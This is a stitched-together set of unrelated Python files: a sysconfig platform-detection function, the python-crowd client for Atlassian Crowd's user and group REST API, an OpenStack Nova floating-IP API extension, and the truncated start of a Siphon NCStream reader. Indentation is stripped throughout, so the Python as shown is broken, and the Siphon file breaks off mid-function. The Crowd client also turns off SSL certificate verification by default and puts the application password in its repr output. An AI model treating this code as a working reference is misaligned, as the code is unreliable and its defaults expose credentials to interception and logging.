win-amd64 (64bit Windows on AMD64 (aka x86_64, Intel64, EM64T, etc)
win-ia64 (64bit Windows on Itanium)
win32 (all others - specifically, sys.platform is returned)
For other non-POSIX platforms, currently just returns 'sys.platform'.
"""
if os.name == 'nt':
# sniff sys.version for architecture.
prefix = " bit ("
i = sys.version.find(prefix)
if i == -1:
return sys.platform
j = sys.version.find(")", i)
look = sys.version[i+len(prefix):j].lower()
if look == 'amd64':
return 'win-amd64'
if look == 'itanium':
return 'win-ia64'
return sys.platform
if os.name != "posix" or not hasattr(os, 'uname'):
# XXX what about the architecture? NT is Intel or Alpha,
# Mac OS is M68k or PPC, etc.
return sys.platform
# Try to distinguish various flavours of Unix
osname, host, release, version, machine = os.uname()
# Convert the OS name to lowercase, remove '/' characters
# (to accommodate BSD/OS), and translate spaces (for "Power Macintosh")
osname = osname.lower().replace('/', '')
machine = machine.replace(' ', '_')
machine = machine.replace('/', '-')
if osname[:5] == "linux":
# At least on Linux/Intel, 'machine' is the processor --
# i386, etc.
# XXX what about Alpha, SPARC, etc?
return "%s-%s" % (osname, machine)
elif osname[:5] == "sunos":
if release[0] >= "5": # SunOS 5 == Solaris 2
osname = "solaris"
release = "%d.%s" % (int(release[0]) - 3, release[2:])
# fall through to standard osname-release-machine representation
elif osname[:4] == "irix": # could be "irix64"!
return "%s-%s" % (osname, release)
elif osname[:3] == "aix":
return "%s-%s.%s" % (osname, version, release)
elif osname[:6] == "cygwin":
osname = "cygwin"
rel_re = re.compile(r'[\d.]+')
m = rel_re.match(release)
if m:
release = m.group()
elif osname[:6] == "darwin":
#
# For our purposes, we'll assume that the system version from
# distutils' perspective is what MACOSX_DEPLOYMENT_TARGET is set
# to. This makes the compatibility story a bit more sane because the
# machine is going to compile and link as if it were
# MACOSX_DEPLOYMENT_TARGET.
cfgvars = get_config_vars()
macver = cfgvars.get('MACOSX_DEPLOYMENT_TARGET')
if True:
# Always calculate the release of the running machine,
# needed to determine if we can build fat binaries or not.
macrelease = macver
# Get the system version. Reading this plist is a documented
# way to get the system version (see the documentation for
# the Gestalt Manager)
try:
f = open('/System/Library/CoreServices/SystemVersion.plist')
except IOError:
# We're on a plain darwin box, fall back to the default
# behaviour.
pass
else:
try:
m = re.search(r'<key>ProductUserVisibleVersion</key>\s*'
r'<string>(.*?)</string>', f.read())
finally:
f.close()
if m is not None:
macrelease = '.'.join(m.group(1).split('.')[:2])
# else: fall back to the default behaviour
if not macver:
macver = macrelease
if macver:
release = macver
osname = "macosx"
if ((macrelease + '.') >= '10.4.' and
'-arch' in get_config_vars().get('CFLAGS', '').strip()):
# The universal build will build fat binaries, but not on
# systems before 10.4
#
# Try to detect 4-way universal builds, those have machine-type
# 'universal' instead of 'fat'.
machine = 'fat'
cflags = get_config_vars().get('CFLAGS')
archs = re.findall('-arch\s+(\S+)', cflags)
archs = tuple(sorted(set(archs)))
if len(archs) == 1:
machine = archs[0]
elif archs == ('i386', 'ppc'):
machine = 'fat'
elif archs == ('i386', 'x86_64'):
machine = 'intel'
elif archs == ('i386', 'ppc', 'x86_64'):
machine = 'fat3'
elif archs == ('ppc64', 'x86_64'):
machine = 'fat64'
elif archs == ('i386', 'ppc', 'ppc64', 'x86_64'):
machine = 'universal'
else:
raise ValueError(
"Don't know machine value for archs=%r" % (archs,))
elif machine == 'i386':
# On OSX the machine type returned by uname is always the
# 32-bit variant, even if the executable architecture is
# the 64-bit variant
if sys.maxsize >= 2**32:
machine = 'x86_64'
elif machine in ('PowerPC', 'Power_Macintosh'):
# Pick a sane name for the PPC architecture.
# See 'i386' case
if sys.maxsize >= 2**32:
machine = 'ppc64'
else:
machine = 'ppc'
return "%s-%s-%s" % (osname, release, machine)
def get_python_version():
return _PY_VERSION_SHORT
def _print_dict(title, data):
for index, (key, value) in enumerate(sorted(data.items())):
if index == 0:
print('%s: ' % (title))
print('\t%s = "%s"' % (key, value))
def _main():
"""Display all information sysconfig detains."""
print('Platform: "%s"' % get_platform())
print('Python version: "%s"' % get_python_version())
print('Current installation scheme: "%s"' % _get_default_scheme())
print()
_print_dict('Paths', get_paths())
print()
_print_dict('Variables', get_config_vars())
if __name__ == '__main__':
_main()
| |
# Copyright 2012 Alexander Else <aelse@else.id.au>.
#
# This file is part of the python-crowd library.
#
# python-crowd is free software released under the BSD License.
# Please see the LICENSE file included in this distribution for
# terms of use. This LICENSE is also available at
# https://github.com/aelse/python-crowd/blob/master/LICENSE
import json
import requests
import xmltodict
class CrowdAuthFailure(Exception):
"""A failure occurred while performing an authentication operation"""
pass
class CrowdAuthDenied(Exception):
"""Crowd server refused to perform the operation"""
pass
class CrowdUserExists(Exception):
pass
class CrowdNoSuchUser(Exception):
pass
class CrowdGroupExists(Exception):
pass
class CrowdNoSuchGroup(Exception):
pass
class CrowdError(Exception):
"""Generic exception when unexpected response encountered"""
def __init__(self, message=None):
if not message:
message = "unexpected response from Crowd server"
Exception.__init__(self, message)
class CrowdServer(object):
"""Crowd server authentication object.
This is a Crowd authentication class to be configured for a
particular application (app_name) to authenticate users
against a Crowd server (crowd_url).
This module uses the Crowd JSON API for talking to Crowd.
An application account must be configured in the Crowd server
and permitted to authenticate users against one or more user
directories prior to using this module.
Please see the Crowd documentation for information about
configuring additional applications to talk to Crowd.
The ``ssl_verify`` parameter controls how and if certificates are verified.
If ``True``, the SSL certificate will be verified.
A CA_BUNDLE path can also be provided.
"""
def __init__(self, crowd_url, app_name, app_pass, ssl_verify=False, timeout=None):
self.crowd_url = crowd_url
self.app_name = app_name
self.app_pass = app_pass
self.rest_url = crowd_url.rstrip("/") + "/rest/usermanagement/1"
self.timeout = timeout
self.session = requests.Session()
self.session.verify = ssl_verify
self.session.auth = requests.auth.HTTPBasicAuth(app_name, app_pass)
self.session.headers.update({
"Content-type": "application/json",
"Accept": "application/json"
})
def __str__(self):
return "Crowd Server at %s" % self.crowd_url
def __repr__(self):
return "<CrowdServer('%s', '%s', '%s')>" % \
(self.crowd_url, self.app_name, self.app_pass)
def _get(self, *args, **kwargs):
"""Wrapper around Requests for GET requests
Returns:
Response:
A Requests Response object
"""
req = self.session.get(*args, **kwargs)
return req
def _post(self, *args, **kwargs):
"""Wrapper around Requests for POST requests
Returns:
Response:
A Requests Response object
"""
req = self.session.post(*args, **kwargs)
return req
def _put(self, *args, **kwargs):
"""Wrapper around Requests for PUT requests
Returns:
Response:
A Requests Response object
"""
if 'timeout' not in kwargs:
kwargs['timeout'] = self.timeout
req = self.session.put(*args, **kwargs)
return req
def _delete(self, *args, **kwargs):
"""Wrapper around Requests for DELETE requests
Returns:
Response:
A Requests Response object
"""
req = self.session.delete(*args, **kwargs)
return req
def auth_ping(self):
"""Test that application can authenticate to Crowd.
Attempts to authenticate the application user against
the Crowd server. In order for user authentication to
work, an application must be able to authenticate.
Returns:
bool:
True if the application authentication succeeded.
Raises:
CrowdError: If auth ping could not be completed.
"""
url = self.rest_url + "/non-existent/location"
response = self._get(url)
if response.status_code == 401:
return False
if response.status_code == 404:
# A 'not found' response indicates we passed app auth
return True
# An error encountered - problem with the Crowd server?
raise CrowdError("unidentified problem")
def auth_user(self, username, password):
"""Authenticate a user account against the Crowd server.
Attempts to authenticate the user against the Crowd server.
Args:
username: The account username.
password: The account password.
Returns:
dict:
A dict mapping of user attributes if the application
authentication was successful. See the Crowd documentation
for the authoritative list of attributes.
None: If received negative authentication response
Raises:
CrowdAuthFailure:
If authentication attempt failed (other than negative response)
"""
response = self._post(self.rest_url + "/authentication",
data=json.dumps({"value": password}),
params={"username": username})
if response.status_code == 200:
return response.json()
if response.status_code == 400:
j = response.json()
raise CrowdAuthFailure(j['message'])
raise CrowdError
def get_session(self, username, password=None, remote="127.0.0.1"):
"""Create a session for a user.
Attempts to create a user session on the Crowd server.
Args:
username: The account username.
password: The account password.
remote:
The remote address of the user. This can be used
to create multiple concurrent sessions for a user.
The host you run this program on may need to be configured
in Crowd as a trusted proxy for this to work.
Returns:
dict:
A dict mapping of user attributes if the application
authentication was successful. See the Crowd
documentation for the authoritative list of attributes.
Raises:
CrowdAuthFailure: If authentication failed.
"""
data = {
"username": username,
"password": password,
"validation-factors": {
"validationFactors": [
{"name": "remote_address", "value": remote, }
]
}
}
if password is None:
params = {"expand": "user", "validate-password": "false"}
else:
params = {"expand": "user"}
response = self._post(self.rest_url + "/session",
data=json.dumps(data),
params=params)
if response.status_code == 201:
return response.json()
if response.status_code == 400:
j = response.json()
raise CrowdAuthFailure(j['message'])
raise CrowdError
def validate_session(self, token, remote="127.0.0.1"):
"""Validate a session token.
Validate a previously acquired session token against the
Crowd server. This may be a token provided by a user from
a http cookie or by some other means.
Args:
token: The session token.
remote: The remote address of the user.
Returns:
dict:
A dict mapping of user attributes if the application
authentication was successful. See the Crowd
documentation for the authoritative list of attributes.
Raises:
CrowdAuthFailure: If authentication failed.
"""
params = {
"validationFactors": [
{"name": "remote_address", "value": remote, }
]
}
url = self.rest_url + "/session/%s" % token
response = self._post(url, data=json.dumps(params),
params={"expand": "user"})
# If token validation failed for any reason raise exception
if not response.ok:
raise CrowdAuthFailure
# Otherwise return the user object
return response.json()
def terminate_session(self, token):
"""Terminates the session token, effectively logging out the user
from all crowd-enabled services.
Args:
token: The session token.
Returns:
True: If session terminated
Raises:
CrowdError: If authentication failed.
"""
url = self.rest_url + "/session/%s" % token
response = self._delete(url)
if response.status_code == 204:
return True
raise CrowdError
def add_user(self, username, **kwargs):
"""Add a user to the directory
Args:
username: The account username
**kwargs: key-value pairs:
password: mandatory
email: mandatory
first_name: optional
last_name: optional
display_name: optional
active: optional (default True)
Returns:
True: Succeeded
False: If unsuccessful
Raises:
CrowdError: If authentication failed.
"""
# Populate data with default and mandatory values.
# A KeyError means a mandatory value was not provided,
# so raise a ValueError indicating bad args.
try:
data = {
"name": username,
"first-name": username,
"last-name": username,
"display-name": username,
"email": kwargs["email"],
"password": {"value": kwargs["password"]},
"active": True
}
except KeyError as e:
raise ValueError("missing %s" % e.message)
# Remove special case 'password'
del(kwargs["password"])
# Put values from kwargs into data
for k, v in kwargs.items():
new_k = k.replace("_", "-")
if new_k not in data:
raise ValueError("invalid argument %s" % k)
data[new_k] = v
response = self._post(self.rest_url + "/user",
data=json.dumps(data))
# Crowd should return 201, 400 or 403
if response.status_code == 201:
return True
if response.status_code == 400:
# User already exists / no password given (but we checked that)
raise CrowdUserExists
if response.status_code == 403:
raise CrowdAuthDenied("application is not allowed to create "
"a new user")
raise CrowdError
def change_password(self, username, newpassword, raise_on_error=False):
"""Change new password for a user
Args:
username: The account username.
newpassword: The account new password.
raise_on_error: optional (default: False)
Returns:
True: Succeeded
False: If unsuccessful
"""
response = self._put(self.rest_url + "/user/password",
data=json.dumps({"value": newpassword}),
params={"username": username})
if response.ok:
return True
if raise_on_error:
raise RuntimeError(response.json()['message'])
return False
def remove_user(self, username):
"""Remove a user from the directory
Args:
username: The account username
Returns:
True: Succeeded
Raises:
CrowdNoSuchUser: If user did not exist
CrowdAuthDenied: If application not allowed to delete the user
"""
response = self._delete(self.rest_url + "/user",
params={"username": username})
# Crowd should return 204, 403 or 404
if response.status_code == 204:
return True
if response.status_code == 403:
raise CrowdAuthDenied("application is not allowed to delete user")
if response.status_code == 404:
# User did not exist
raise CrowdNoSuchUser
raise CrowdError
def remove_group(self, group_name):
"""Remove a group from the directory
Args:
group_name: The group name to remove
Returns:
True: Succeeded
Raises:
CrowdNoSuchGroup: If group did not exist
CrowdAuthDenied: If application not allowed to delete the group
"""
response = self._delete(self.rest_url + "/group",
params={"groupname": group_name})
# Crowd should return 204, 403 or 404
if response.status_code == 204:
return True
if response.status_code == 403:
raise CrowdAuthDenied("application is not allowed to delete user")
if response.status_code == 404:
# User did not exist
raise CrowdNoSuchGroup
raise CrowdError
def get_user(self, username):
"""Retrieve information about a user
Returns:
dict: User information
None: If no such user
Raises:
CrowdError: If unexpected response from Crowd server
"""
response = self._get(self.rest_url + "/user",
params={"username": username,
"expand": "attributes"})
if response.status_code == 200:
return response.json()
if response.status_code == 404:
return None
raise CrowdError
def get_user_direct_group(self, username, groupname):
"""Retrieves the user that is a direct member of the specified group
Returns:
dict: User information
None: If no such user in the group
Raises:
CrowdError: If unexpected response from Crowd server
"""
response = self._get(self.rest_url + "/group/user/direct",
params={"groupname": groupname,
"username": username})
if response.status_code == 200:
return response.json()
if response.status_code == 404:
return None
raise CrowdError
def get_group_by_groupname(self, groupname):
response = self._get(self.rest_url + "/group",
params={"groupname": groupname})
if response.status_code == 200:
return True
return False
def get_child_group_direct(self, groupname):
"""Retrieves the groups that are direct children of the specified group
Returns:
List: Group names
None: If no such group is found
Raises:
CrowdError: If unexpected response from Crowd server
"""
response = self._get(self.rest_url + "/group/child-group/direct",
params={"groupname": groupname})
if response.status_code == 200:
return response.json()
if response.status_code == 404:
return None
raise CrowdError
def get_group_membership(self):
"""Retrieves full details of all group memberships, with users and nested groups.
Returns:
Dict: All group memberships
None: If no such group is found
Raises:
CrowdError: If unexpected response from Crowd server
"""
self.session.headers.update({
"Content-type": "application/xml",
"Accept": "application/xml"
})
response = self._get(self.rest_url + "/group/membership")
if response.status_code == 200:
self.session.headers.update({
"Content-type": "application/json",
"Accept": "application/json"
})
return xmltodict.parse(response.content)
if response.status_code == 404:
self.session.headers.update({
"Content-type": "application/json",
"Accept": "application/json"
})
return None
self.session.headers.update({
"Content-type": "application/json",
"Accept": "application/json"
})
raise CrowdError
def get_group_users_direct(self, groupname):
"""Retrieves the users that are direct members of the specified group
Returns:
List: Users
None: If no such group is found
Raises:
CrowdError: If unexpected response from Crowd server
"""
response = self._get(self.rest_url + "/group/user/direct",
params={"groupname": groupname})
if response.status_code == 200:
return response.json()
if response.status_code == 404:
return None
raise CrowdError
def add_group(self, groupname, **kwargs):
"""Creates a group
Returns:
True: The group was created
Raises:
CrowdGroupExists: The group already exists
CrowdAuthFail
CrowdError: If unexpected response from Crowd server
"""
data = {
"name": groupname,
"description": groupname,
"active": True,
"type": "GROUP"
}
# Put values from kwargs into data
for k, v in kwargs.items():
if k not in data:
raise ValueError("invalid argument %s" % k)
data[k] = v
response = self._post(self.rest_url + "/group",
data=json.dumps(data))
if response.status_code == 201:
return True
if response.status_code == 400:
raise CrowdGroupExists
if response.status_code == 403:
raise CrowdAuthFailure
raise CrowdError("status code %d" % response.status_code)
def get_groups(self, username):
"""Retrieves a list of group names that have <username> as a
direct member.
Returns:
list:
A list of strings of group names.
None: If user not found
Raises:
CrowdError: If unexpected response from Crowd server
"""
response = self._get(self.rest_url + "/user/group/direct",
params={"username": username})
if response.status_code == 200:
return [g['name'] for g in response.json()['groups']]
if response.status_code == 404:
return None
raise CrowdError
def get_nested_groups(self, username):
"""Retrieve a list of all group names that have <username> as
a direct or indirect member.
Args:
username: The account username.
Returns:
list:
A list of strings of group names.
None: If user not found
Raises:
CrowdError: If unexpected response from Crowd server
"""
response = self._get(self.rest_url + "/user/group/nested",
params={"username": username})
if response.status_code == 200:
return [g['name'] for g in response.json()['groups']]
if response.status_code == 404:
return None
raise CrowdError
def get_nested_group_users(self, groupname):
"""Retrieves a list of all users that directly or indirectly
belong to the given groupname.
Args:
groupname: The group name.
Returns:
list:
A list of strings of user names.
"""
response = self._get(self.rest_url + "/group/user/nested",
params={"groupname": groupname,
"start-index": 0,
"max-results": 99999})
if not response.ok:
return None
return [u['name'] for u in response.json()['users']]
def add_user_to_group(self, username, groupname):
"""Make user a direct member of a group
Args:
username: The user name.
groupname: The group name.
Returns:
True: If successful
Raises:
CrowdNoSuchUser: The user does not exist
CrowdNoSuchGroup: The group does not exist
CrowdUserExists: The user is already a member
CrowdError: Unexpected response
"""
response = self._post(self.rest_url + "/group/user/direct",
data=json.dumps({"name": username}),
params={"groupname": groupname})
if response.status_code == 201:
return True
if response.status_code == 400:
raise CrowdNoSuchUser
if response.status_code == 404:
raise CrowdNoSuchGroup
if response.status_code == 409:
raise CrowdUserExists
raise CrowdError("received server response %d" % response.status_code)
def add_child_group_to_group(self, parentgroupname, childgroupname):
"""Make user a direct member of a group
Args:
username: The user name.
groupname: The group name.
Returns:
True: If successful
Raises:
CrowdNoSuchUser: The user does not exist
CrowdNoSuchGroup: The group does not exist
CrowdUserExists: The user is already a member
CrowdError: Unexpected response
"""
response = self._post(self.rest_url + "/group/child-group/direct",
data=json.dumps({"name": childgroupname}),
params={"groupname": parentgroupname})
if response.status_code == 201:
return True
if response.status_code == 400:
raise CrowdNoSuchUser
if response.status_code == 404:
raise CrowdNoSuchGroup
raise CrowdError("received server response %d" % response.status_code)
def remove_child_group_from_group(self, parentgroupname, childgroupname):
"""Make user a direct member of a group
Args:
username: The user name.
groupname: The group name.
Returns:
True: If successful
Raises:
CrowdNoSuchUser: The user does not exist
CrowdNoSuchGroup: The group does not exist
CrowdUserExists: The user is already a member
CrowdError: Unexpected response
"""
response = self._delete(self.rest_url + "/group/child-group/direct",
params={"groupname": parentgroupname,
"child-groupname": childgroupname})
if response.status_code == 204:
return True
if response.status_code == 403:
raise CrowdAuthDenied("application is not allowed to delete group")
if response.status_code == 404:
# User did not exist
raise CrowdNoSuchUser
raise CrowdError("received server response %d" % response.status_code)
def remove_user_from_group(self, username, groupname):
"""Remove user as a direct member of a group
Args:
username: The user name.
groupname: The group name.
Returns:
True: If successful
Raises:
CrowdNotFound: The user or group does not exist
CrowdUserExists: The user is already a member
CrowdError: Unexpected response
"""
response = self._delete(self.rest_url + "/group/user/direct",
params={"groupname": groupname,
"username": username})
if response.status_code == 204:
return True
if response.status_code == 404:
# user or group does not exist
j = response.json()
if j['message'].lower().startswith('group'):
raise CrowdNoSuchGroup
elif j['message'].lower().startswith('user'):
raise CrowdNoSuchUser
else:
raise CrowdError("unknown server response")
raise CrowdError
def user_exists(self, username):
"""Determines if the user exists.
Args:
username: The user name.
Returns:
bool:
True if the user exists in the Crowd application.
"""
response = self._get(self.rest_url + "/user",
params={"username": username})
if not response.ok:
return None
return True
def group_exists(self, group):
"""Determines if the group exists.
Args:
group: The group name.
Returns:
bool:
True if the group exists in the Crowd application.
"""
response = self._get(self.rest_url + "/group",
params={"groupname": group})
if not response.ok:
return None
return True
def get_cookie_config(self):
"""Gets the cookie configuration of crowd.
Returns:
json:
<domain>.atlassian.com</domain>
<secure>true</secure>
<name>cookie-name</name>
"""
response = self._get(self.rest_url + "/config/cookie")
if response.status_code == 200:
return response.json()
raise CrowdError("received server response %d" % response.status_code)
# def search(self, entity_type, property_name, search_string):
# """Performs a user search using the Crowd search API.
# https://developer.atlassian.com/display/CROWDDEV/Crowd+REST+Resources#CrowdRESTResources-SearchResource
# Args:
# entity_type: 'user' or 'group'
# property_name: eg. 'email', 'name'
# search_string: the string to search for.
# Returns:
# json results:
# Returns search results.
# """
#
# params = {
# "entity-type": entity_type,
# "expand": entity_type,
# "max-results": 10000,
# "property-search-restriction": {
# "property": {"name": property_name, "type": "STRING"},
# "match-mode": "CONTAINS",
# "value": search_string,
# }
# }
#
# params = {
# 'entity-type': entity_type,
# 'expand': entity_type,
# 'max-results': 10000,
# }
# # Construct XML payload of the form:
# # <property-search-restriction>
# # <property>
# # <name>email</name>
# # <type>STRING</type>
# # </property>
# # <match-mode>EXACTLY_MATCHES</match-mode>
# # <value>bob@example.net</value>
# # </property-search-restriction>
#
# root = etree.Element('property-search-restriction')
#
# property_ = etree.Element('property')
# prop_name = etree.Element('name')
# prop_name.text = property_name
# property_.append(prop_name)
# prop_type = etree.Element('type')
# prop_type.text = 'STRING'
# property_.append(prop_type)
# root.append(property_)
#
# match_mode = etree.Element('match-mode')
# match_mode.text = 'CONTAINS'
# root.append(match_mode)
#
# value = etree.Element('value')
# value.text = search_string
# root.append(value)
#
# # Construct the XML payload expected by search API
# payload = '<?xml version="1.0" encoding="UTF-8"?>\n' + etree.tostring(root).decode('utf-8')
#
# # We're sending XML but would like a JSON response
# session = self._build_session(content_type='xml')
# session.headers.update({'Accept': 'application/json'})
# response = session.post(self.rest_url + "/search", params=params, data=payload, timeout=self.timeout)
#
# if not response.ok:
# return None
#
# return response.json()
| |
# Copyright 2011 OpenStack Foundation
# Copyright (c) 2011 X.commerce, a business unit of eBay Inc.
# Copyright 2011 Grid Dynamics
# Copyright 2011 Eldar Nugaev, Kirill Shileev, Ilya Alekseyev
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_log import log as logging
import webob
from nova.api.openstack import common
from nova.api.openstack.compute.schemas.v3 import floating_ips
from nova.api.openstack import extensions
from nova.api.openstack import wsgi
from nova.api import validation
from nova import compute
from nova.compute import utils as compute_utils
from nova import exception
from nova.i18n import _
from nova.i18n import _LW
from nova import network
from nova.openstack.common import uuidutils
LOG = logging.getLogger(__name__)
ALIAS = 'os-floating-ips'
authorize = extensions.os_compute_authorizer(ALIAS)
def _translate_floating_ip_view(floating_ip):
result = {
'id': floating_ip['id'],
'ip': floating_ip['address'],
'pool': floating_ip['pool'],
}
try:
result['fixed_ip'] = floating_ip['fixed_ip']['address']
except (TypeError, KeyError, AttributeError):
result['fixed_ip'] = None
try:
result['instance_id'] = floating_ip['fixed_ip']['instance_uuid']
except (TypeError, KeyError, AttributeError):
result['instance_id'] = None
return {'floating_ip': result}
def _translate_floating_ips_view(floating_ips):
return {'floating_ips': [_translate_floating_ip_view(ip)['floating_ip']
for ip in floating_ips]}
def get_instance_by_floating_ip_addr(self, context, address):
try:
instance_id =\
self.network_api.get_instance_id_by_floating_address(
context, address)
except exception.FloatingIpNotFoundForAddress as ex:
raise webob.exc.HTTPNotFound(explanation=ex.format_message())
except exception.FloatingIpMultipleFoundForAddress as ex:
raise webob.exc.HTTPConflict(explanation=ex.format_message())
if instance_id:
return common.get_instance(self.compute_api, context, instance_id,
want_objects=True)
def disassociate_floating_ip(self, context, instance, address):
try:
self.network_api.disassociate_floating_ip(context, instance, address)
except exception.Forbidden:
raise webob.exc.HTTPForbidden()
except exception.CannotDisassociateAutoAssignedFloatingIP:
msg = _('Cannot disassociate auto assigned floating ip')
raise webob.exc.HTTPForbidden(explanation=msg)
class FloatingIPController(object):
"""The Floating IPs API controller for the OpenStack API."""
def __init__(self):
self.compute_api = compute.API(skip_policy_check=True)
self.network_api = network.API(skip_policy_check=True)
super(FloatingIPController, self).__init__()
@extensions.expected_errors((400, 404))
def show(self, req, id):
"""Return data about the given floating ip."""
context = req.environ['nova.context']
authorize(context)
try:
floating_ip = self.network_api.get_floating_ip(context, id)
except (exception.NotFound, exception.FloatingIpNotFound):
msg = _("Floating ip not found for id %s") % id
raise webob.exc.HTTPNotFound(explanation=msg)
except exception.InvalidID as e:
raise webob.exc.HTTPBadRequest(explanation=e.format_message())
return _translate_floating_ip_view(floating_ip)
@extensions.expected_errors(())
def index(self, req):
"""Return a list of floating ips allocated to a project."""
context = req.environ['nova.context']
authorize(context)
floating_ips = self.network_api.get_floating_ips_by_project(context)
return _translate_floating_ips_view(floating_ips)
@extensions.expected_errors((403, 404))
def create(self, req, body=None):
context = req.environ['nova.context']
authorize(context)
pool = None
if body and 'pool' in body:
pool = body['pool']
try:
address = self.network_api.allocate_floating_ip(context, pool)
ip = self.network_api.get_floating_ip_by_address(context, address)
except exception.NoMoreFloatingIps:
if pool:
msg = _("No more floating ips in pool %s.") % pool
else:
msg = _("No more floating ips available.")
raise webob.exc.HTTPNotFound(explanation=msg)
except exception.FloatingIpLimitExceeded:
if pool:
msg = _("IP allocation over quota in pool %s.") % pool
else:
msg = _("IP allocation over quota.")
raise webob.exc.HTTPForbidden(explanation=msg)
except exception.FloatingIpPoolNotFound as e:
raise webob.exc.HTTPNotFound(explanation=e.format_message())
return _translate_floating_ip_view(ip)
@wsgi.response(202)
@extensions.expected_errors((400, 403, 404, 409))
def delete(self, req, id):
context = req.environ['nova.context']
authorize(context)
# get the floating ip object
try:
floating_ip = self.network_api.get_floating_ip(context, id)
except (exception.NotFound, exception.FloatingIpNotFound):
msg = _("Floating ip not found for id %s") % id
raise webob.exc.HTTPNotFound(explanation=msg)
except exception.InvalidID as e:
raise webob.exc.HTTPBadRequest(explanation=e.format_message())
address = floating_ip['address']
# get the associated instance object (if any)
instance = get_instance_by_floating_ip_addr(self, context, address)
try:
self.network_api.disassociate_and_release_floating_ip(
context, instance, floating_ip)
except exception.Forbidden:
raise webob.exc.HTTPForbidden()
except exception.CannotDisassociateAutoAssignedFloatingIP:
msg = _('Cannot disassociate auto assigned floating ip')
raise webob.exc.HTTPForbidden(explanation=msg)
class FloatingIPActionController(wsgi.Controller):
def __init__(self, *args, **kwargs):
super(FloatingIPActionController, self).__init__(*args, **kwargs)
self.compute_api = compute.API(skip_policy_check=True)
self.network_api = network.API(skip_policy_check=True)
@extensions.expected_errors((400, 403, 404))
@wsgi.action('addFloatingIp')
@validation.schema(floating_ips.add_floating_ip)
def _add_floating_ip(self, req, id, body):
"""Associate floating_ip to an instance."""
context = req.environ['nova.context']
authorize(context)
address = body['addFloatingIp']['address']
instance = common.get_instance(self.compute_api, context, id,
want_objects=True)
cached_nwinfo = compute_utils.get_nw_info_for_instance(instance)
if not cached_nwinfo:
msg = _('No nw_info cache associated with instance')
raise webob.exc.HTTPBadRequest(explanation=msg)
fixed_ips = cached_nwinfo.fixed_ips()
if not fixed_ips:
msg = _('No fixed ips associated to instance')
raise webob.exc.HTTPBadRequest(explanation=msg)
fixed_address = None
if 'fixed_address' in body['addFloatingIp']:
fixed_address = body['addFloatingIp']['fixed_address']
for fixed in fixed_ips:
if fixed['address'] == fixed_address:
break
else:
msg = _('Specified fixed address not assigned to instance')
raise webob.exc.HTTPBadRequest(explanation=msg)
if not fixed_address:
fixed_address = fixed_ips[0]['address']
if len(fixed_ips) > 1:
LOG.warning(_LW('multiple fixed_ips exist, using the first: '
'%s'), fixed_address)
try:
self.network_api.associate_floating_ip(context, instance,
floating_address=address,
fixed_address=fixed_address)
except exception.FloatingIpAssociated:
msg = _('floating ip is already associated')
raise webob.exc.HTTPBadRequest(explanation=msg)
except exception.NoFloatingIpInterface:
msg = _('l3driver call to add floating ip failed')
raise webob.exc.HTTPBadRequest(explanation=msg)
except exception.FloatingIpNotFoundForAddress:
msg = _('floating ip not found')
raise webob.exc.HTTPNotFound(explanation=msg)
except exception.Forbidden as e:
raise webob.exc.HTTPForbidden(explanation=e.format_message())
except Exception as e:
msg = _('Unable to associate floating ip %(address)s to '
'fixed ip %(fixed_address)s for instance %(id)s. '
'Error: %(error)s') % (
{'address': address, 'fixed_address': fixed_address,
'id': id, 'error': e})
LOG.exception(msg)
raise webob.exc.HTTPBadRequest(explanation=msg)
return webob.Response(status_int=202)
@extensions.expected_errors((400, 403, 404, 409))
@wsgi.action('removeFloatingIp')
@validation.schema(floating_ips.remove_floating_ip)
def _remove_floating_ip(self, req, id, body):
"""Dissociate floating_ip from an instance."""
context = req.environ['nova.context']
authorize(context)
address = body['removeFloatingIp']['address']
# get the floating ip object
try:
floating_ip = self.network_api.get_floating_ip_by_address(context,
address)
except exception.FloatingIpNotFoundForAddress:
msg = _("floating ip not found")
raise webob.exc.HTTPNotFound(explanation=msg)
# get the associated instance object (if any)
instance = get_instance_by_floating_ip_addr(self, context, address)
# disassociate if associated
if (instance and
floating_ip.get('fixed_ip_id') and
(uuidutils.is_uuid_like(id) and
[instance.uuid == id] or
[instance.id == id])[0]):
try:
disassociate_floating_ip(self, context, instance, address)
except exception.FloatingIpNotAssociated:
msg = _('Floating ip is not associated')
raise webob.exc.HTTPBadRequest(explanation=msg)
return webob.Response(status_int=202)
else:
msg = _("Floating ip %(address)s is not associated with instance "
"%(id)s.") % {'address': address, 'id': id}
raise webob.exc.HTTPConflict(explanation=msg)
class FloatingIps(extensions.V3APIExtensionBase):
"""Floating IPs support."""
name = "FloatingIps"
alias = ALIAS
version = 1
def get_resources(self):
resource = [extensions.ResourceExtension(ALIAS,
FloatingIPController())]
return resource
def get_controller_extensions(self):
controller = FloatingIPActionController()
extension = extensions.ControllerExtension(self, 'servers', controller)
return [extension]
| |
# Copyright (c) 2014-2016 Siphon Contributors.
# Distributed under the terms of the BSD 3-Clause License.
# SPDX-License-Identifier: BSD-3-Clause
"""Handle binary stream returns in NCStream format."""
from collections import OrderedDict
import itertools
import logging
import zlib
import numpy as np
from . import cdmrfeature_pb2 as cdmrf
from . import ncStream_pb2 as stream # noqa
MAGIC_HEADER = b'\xad\xec\xce\xda'
MAGIC_DATA = b'\xab\xec\xce\xba'
MAGIC_DATA2 = b'\xab\xeb\xbe\xba'
MAGIC_VDATA = b'\xab\xef\xfe\xba'
MAGIC_VEND = b'\xed\xef\xfe\xda'
MAGIC_ERR = b'\xab\xad\xba\xda'
MAGIC_HEADERCOV = b'\xad\xed\xde\xda'
MAGIC_DATACOV = b'\xab\xed\xde\xba'
log = logging.getLogger(__name__)
log.setLevel(logging.WARNING)
#
# NCStream handling
#
def read_ncstream_data(fobj):
"""Handle reading an NcStream v1 data block from a file-like object."""
data = read_proto_object(fobj, stream.Data)
if data.dataType in (stream.STRING, stream.OPAQUE) or data.vdata:
log.debug('Reading string/opaque/vlen')
num_obj = read_var_int(fobj)
log.debug('Num objects: %d', num_obj)
blocks = [read_block(fobj) for _ in range(num_obj)]
if data.dataType == stream.STRING:
blocks = [b.decode('utf-8', errors='ignore') for b in blocks]
# Again endian isn't coded properly
dt = data_type_to_numpy(data.dataType).newbyteorder('>')
if data.vdata:
return np.array([np.frombuffer(b, dtype=dt) for b in blocks], dtype=object)
else:
